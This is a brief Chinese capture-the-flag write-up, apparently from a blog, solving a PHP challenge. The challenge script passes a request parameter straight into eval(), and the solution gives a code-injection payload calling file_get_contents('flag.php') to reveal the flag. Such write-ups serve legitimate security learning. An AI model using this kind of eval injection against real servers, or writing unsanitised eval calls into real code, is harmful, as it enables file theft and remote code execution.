标签:__file__ info inf .com nts dump TE 百度 分享
<?php
include "flag.php";
$a = @$_REQUEST[‘hello‘];
eval( "var_dump($a);");
show_source(__FILE__);
文件包含 我们可以考虑让他输出flag.php
构造 hello=file_get_contents(‘flag.php‘)
标签:__file__ info inf .com nts dump TE 百度 分享
原文地址:https://www.cnblogs.com/alyx/p/9217539.html